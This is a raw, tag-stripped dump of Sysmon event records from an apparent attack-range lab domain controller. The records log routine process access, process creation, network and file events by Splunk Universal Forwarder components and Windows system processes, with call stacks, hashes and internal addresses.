Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202886Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:17.470{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202885Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:17.470{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202884Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:17.470{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202883Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:17.470{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202882Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:17.470{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E959-6040-364E-00000000AD01}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202881Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:17.470{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E959-6040-364E-00000000AD01}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202880Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:17.471{5ABCFE62-E959-6040-364E-00000000AD01}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000002202909Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:15.025{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60679-false10.0.1.12-8000- 10341000x80000000000000002202908Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:18.814{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E95A-6040-384E-00000000AD01}6288C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202907Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:18.814{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202906Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:18.814{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202905Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:18.814{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202904Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:18.814{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202903Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:18.814{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E95A-6040-384E-00000000AD01}6288C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202902Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:18.814{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E95A-6040-384E-00000000AD01}6288C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202901Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:18.815{5ABCFE62-E95A-6040-384E-00000000AD01}6288C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002202900Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:18.267{5ABCFE62-E95A-6040-374E-00000000AD01}62521472C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002202899Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:18.236{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=39BE2072E55FDFFB22DE5B4EBAE63782,SHA256=B2488361C805EDC0FDAA5292C3706A483333A924C532D0B39965483041681EC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202898Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:18.236{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1AFCE0E1005CC5C890E1F9929D0D233A,SHA256=E9E800B73A7CCAEA9F0BC2B3CB12221DA7DC5D1E1F9596DF78E49B61F44E8A6D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002202897Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:18.142{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E95A-6040-374E-00000000AD01}6252C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202896Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:18.142{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202895Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:18.142{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202894Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:18.142{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202893Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:18.142{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202892Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:18.142{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E95A-6040-374E-00000000AD01}6252C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202891Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:18.142{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E95A-6040-374E-00000000AD01}6252C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202890Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:18.143{5ABCFE62-E95A-6040-374E-00000000AD01}6252C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002202889Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:18.048{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A2E8EC0D5337FAFD14957A2C6321B8E,SHA256=D12D211451A4C495BE180CECD1B28676F8337A9378C76AF2BCF33C1569D346B0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002202920Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:19.611{5ABCFE62-E95B-6040-394E-00000000AD01}4844308C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202919Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:19.486{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E95B-6040-394E-00000000AD01}484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 